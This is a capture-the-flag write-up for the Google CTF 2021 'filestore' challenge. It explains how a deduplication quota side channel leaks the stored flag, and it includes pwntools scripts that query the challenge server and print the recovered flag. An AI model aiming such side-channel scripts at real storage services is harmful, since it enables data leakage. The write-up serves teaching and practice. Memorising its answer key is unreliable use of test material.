We stored our flag on this platform, but forgot to save the id. Can you help us restore it?
Analysis
When running the program, we have 4 options.
➜ Google ./filestore.py
Welcome to our file storage solution.
Menu:
- load
- store
- status
- exit
Let's first look at the source code for saving and loading files.
First, all data is stored in blob:
# It's a tiny server...
blob = bytearray(2**16)
files = {}
used = 0
The storing of data works through deduplication. I've added some comments to the source code to make it more understandable:
# Use deduplication to save space.
def store(data):
    nonlocal used
    MINIMUM_BLOCK = 16
    MAXIMUM_BLOCK = 1024
    part_list = []
    while data:
        prefix = data[:MINIMUM_BLOCK]
        ind = -1
        bestlen, bestind = 0, -1
        # Find the best 'matching' part of the blob
        while True:
            ind = blob.find(prefix, ind+1)
            if ind == -1: break
            length = len(os.path.commonprefix([data, bytes(blob[ind:ind+MAXIMUM_BLOCK])]))
            if length > bestlen:
                bestlen, bestind = length, ind
        # Store the index of the match
        if bestind != -1:
            part, data = data[:bestlen], data[bestlen:]
            part_list.append((bestind, bestlen))
        # Append to the end
        else:
            part, data = data[:MINIMUM_BLOCK], data[MINIMUM_BLOCK:]
            blob[used:used+len(part)] = part
            part_list.append((used, len(part)))
            used += len(part)
            assert used <= len(blob)
    fid = "".join(secrets.choice(string.ascii_letters+string.digits) for i in range(16))
    files[fid] = part_list
    return fid
Each 'file' is essentially represented by a list of (index, length) pairs pointing into the blob bytearray. If the new data duplicates data already in the blob, nothing new is written to the bytearray. Instead, the file is represented by the index and length of the existing copy.
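To experiment with this behaviour without the server, here is a minimal local sketch of the same deduplication logic. The make_store wrapper and the state dictionary are my own scaffolding (they are not in the challenge source); the matching loop follows the store function above.

```python
import os

MINIMUM_BLOCK = 16
MAXIMUM_BLOCK = 1024


def make_store(size=2**16):
    """Hypothetical helper: returns a store() closure plus its usage counter."""
    blob = bytearray(size)
    state = {"used": 0}

    def store(data):
        part_list = []
        while data:
            prefix = data[:MINIMUM_BLOCK]
            ind, bestlen, bestind = -1, 0, -1
            # Look for the longest existing run that starts with the prefix
            while True:
                ind = blob.find(prefix, ind + 1)
                if ind == -1:
                    break
                window = bytes(blob[ind:ind + MAXIMUM_BLOCK])
                length = len(os.path.commonprefix([data, window]))
                if length > bestlen:
                    bestlen, bestind = length, ind
            if bestind != -1:
                # Duplicate found: record a reference, write nothing
                data = data[bestlen:]
                part_list.append((bestind, bestlen))
            else:
                # No match: append one block to the end of the used area
                part, data = data[:MINIMUM_BLOCK], data[MINIMUM_BLOCK:]
                used = state["used"]
                blob[used:used + len(part)] = part
                part_list.append((used, len(part)))
                state["used"] = used + len(part)
        return part_list

    return store, state


store, state = make_store()
print(store(b"testflag"))  # [(0, 8)]  new data, appended at offset 0
print(store(b"test"))      # [(0, 4)]  duplicate, only a reference is stored
print(state["used"])       # 8
```

Storing b"test" after b"testflag" leaves the usage counter untouched, which is the property the rest of this writeup relies on.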
For the purposes of analysis, we can print the first few bytes of blob and the part_list.
Here's an example:
➜ Google ./filestore.py
Welcome to our file storage solution.
# Saving the flag into the blob
bytearray(b'testflag\x00\x00')
[(0, 8)]
Menu:
- load
- store
- status
- exit
store
Send me a line of data...
test
# Duplicated data at index 0
bytearray(b'testflag\x00\x00')
[(0, 4)]
Stored! Here's your file id:
tObXrn5TRAMIGl6W
Now, if we look at the status command, we see that the 'Quota' represents the used space in the blob bytearray. Since the data we stored duplicated existing data, the quota remains at 0.008kB.
This is very helpful to us - it allows us to check whether the data we are storing is a substring of the flag. For inputs of at most 16 bytes (MINIMUM_BLOCK), store searches the blob for the whole input, so if the input is a substring of the flag, the quota remains the same. Otherwise, the input is appended to the blob and the used quota increases.
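The comparison itself can be sketched as a small helper. The sample status lines below are assumptions: they are modelled on the 'Quota: 0.008kB' value and the '/64.000kB' suffix seen in this writeup, not copied from real server output, and the function names are hypothetical.

```python
import re

# Matches e.g. "Quota: 0.008kB/64.000kB" (format assumed from this writeup)
QUOTA_RE = re.compile(r"Quota: ([0-9.]+)kB/([0-9.]+)kB")


def parse_quota(status_text):
    """Return the used-quota field as a string, e.g. '0.008'."""
    match = QUOTA_RE.search(status_text)
    if match is None:
        raise ValueError("no quota line found")
    return match.group(1)


def was_deduplicated(status_before, status_after):
    """True if storing the data did not change the reported quota."""
    return parse_quota(status_before) == parse_quota(status_after)


before = "Quota: 0.008kB/64.000kB"   # hypothetical sample
after_hit = "Quota: 0.008kB/64.000kB"
after_miss = "Quota: 0.012kB/64.000kB"
print(was_deduplicated(before, after_hit))
print(was_deduplicated(before, after_miss))
```

Comparing the printed strings rather than parsed floats avoids any rounding concerns, since the server already formats the value to three decimals.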
Solving
This observation allows us to do a fairly trivial check for which characters are found in the flag. By sending each possible character and checking the quota value afterwards, we can confirm whether or not that character is found in the flag.
from pwn import *
import string
import re

# Read the baseline quota, when only the flag is stored
conn = remote('filestore.2021.ctfcompetition.com', 1337)
conn.recv()
conn.recv()
conn.send(b'status\r\n')
received = conn.recvuntil(b'Menu').decode()
match = re.search(r'Quota: (.+)/64.000kB', received)
target_quota = match[1]
conn.close()

# Store each candidate character on a fresh connection.
# An unchanged quota means the character occurs in the flag.
valid = []
for char in string.ascii_letters + string.digits + '{}_':
    conn = remote('filestore.2021.ctfcompetition.com', 1337)
    conn.recv()
    conn.send(b'store\r\n')
    conn.recv()
    conn.send(f'{char}\r\n'.encode())
    conn.recvuntil(b'Menu')
    conn.send(b'status\r\n')
    received = conn.recvuntil(b'Menu').decode()
    match = re.search(r'Quota: (.+)/64.000kB', received)
    quota = match[1]
    if quota == target_quota:
        print(f"{char} works!")
        valid.append(char)
    conn.close()
print(valid)
But how do we get the flag? Checking every possible string built from these valid characters would take too long, but we can cut the search down by first finding the valid 2-character strings, then concatenating pairs of those to find the valid 4-character strings, and so on. Any substring of the flag of length 2n is the concatenation of two substrings of length n, so nothing is missed, and most candidates are eliminated early on.
from itertools import product

valid_n_chars = {1: valid}
LEN_FLAG = 26
i = 2
# i doubles each round (2, 4, 8, 16) and the loop stops once it exceeds LEN_FLAG
while i <= LEN_FLAG:
    result = []
    # Candidates are all ordered pairs of valid strings of half the length
    permutations = [''.join(x) for x in product(valid_n_chars[i // 2], repeat = 2)]
    num_permutations = len(permutations)
    count = 0
    for permutation in permutations:
        flag = ''.join(permutation)
        print(f"Trying {flag}...")
        conn = remote('filestore.2021.ctfcompetition.com', 1337)
        conn.recv()
        conn.send(b'store\r\n')
        conn.recv()
        conn.send(f'{flag}\r\n'.encode())
        conn.recvuntil(b'Menu')
        conn.send(b'status\r\n')
        received = conn.recvuntil(b'Menu').decode()
        match = re.search(r'Quota: (.+)/64.000kB', received)
        quota = match[1]
        # Unchanged quota: the candidate was deduplicated against the flag
        if quota == target_quota:
            print(f"{flag} works!")
            result.append(flag)
        conn.close()
        if count % 10 == 0:
            print('Progress:', count / num_permutations)
        count += 1
    valid_n_chars[i] = result
    i *= 2
print('Valid results:', result)
This eventually outputs all valid 16-character substrings of the flag.
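The doubling strategy can also be checked offline. The sketch below swaps the network round trip for a local oracle that simply tests substring membership against a made-up secret; SECRET, local_oracle and doubling_search are all hypothetical names for illustration, and the alphabet matches the one used in the scripts above.

```python
from itertools import product
import string

ALPHABET = string.ascii_letters + string.digits + "{}_"
SECRET = "CTF{hypothetical_local_flag}"  # made-up stand-in, not the real flag


def local_oracle(candidate):
    """Stand-in for the quota check: True if candidate would be deduplicated."""
    return candidate in SECRET


def doubling_search(oracle, alphabet, max_len=16):
    """Return {length: accepted strings} for lengths 1, 2, 4, ... up to max_len."""
    valid = {1: [c for c in alphabet if oracle(c)]}
    n = 2
    while n <= max_len:
        half = valid[n // 2]
        # Only concatenations of two accepted halves can be accepted
        valid[n] = [a + b for a, b in product(half, repeat=2) if oracle(a + b)]
        n *= 2
    return valid


found = doubling_search(local_oracle, ALPHABET)
for length, strings in found.items():
    print(length, len(strings))
```

Each round only tests pairs of strings that survived the previous round, so the number of oracle calls stays in the hundreds per round instead of growing with the full alphabet.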
From here, we can reconstruct the flag by chaining together the 16-character substrings that overlap one another: CTF{CR1M3_0f_d3dup1ic4ti0n}
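One way to do the reconstruction automatically is to chain substrings whose last 15 characters match the first 15 characters of another. This is a sketch of that idea rather than the exact procedure used at the time; the reconstruct function is a hypothetical helper and it assumes every overlap is unique, which holds for this flag.

```python
def reconstruct(substrings):
    """Chain equal-length substrings that overlap in all but one character."""
    pieces = set(substrings)
    n = len(next(iter(pieces)))
    if n < 2:
        raise ValueError("pieces must be at least 2 characters long")
    # Map each (n-1)-character prefix to its piece (assumes prefixes are unique)
    by_prefix = {p[:-1]: p for p in pieces}
    suffixes = {p[1:] for p in pieces}
    # The first piece is the one whose prefix is not the suffix of any piece
    starts = [p for p in pieces if p[:-1] not in suffixes]
    if len(starts) != 1:
        raise ValueError("ambiguous or cyclic overlaps")
    result = starts[0]
    seen = {result}
    while result[-(n - 1):] in by_prefix:
        nxt = by_prefix[result[-(n - 1):]]
        if nxt in seen:
            break
        seen.add(nxt)
        result += nxt[-1]
    return result


flag = "CTF{CR1M3_0f_d3dup1ic4ti0n}"
windows = [flag[i:i + 16] for i in range(len(flag) - 15)]
print(reconstruct(reversed(windows)))
```

The demo feeds the windows in reverse order to show that the result does not depend on the order in which the substrings were discovered.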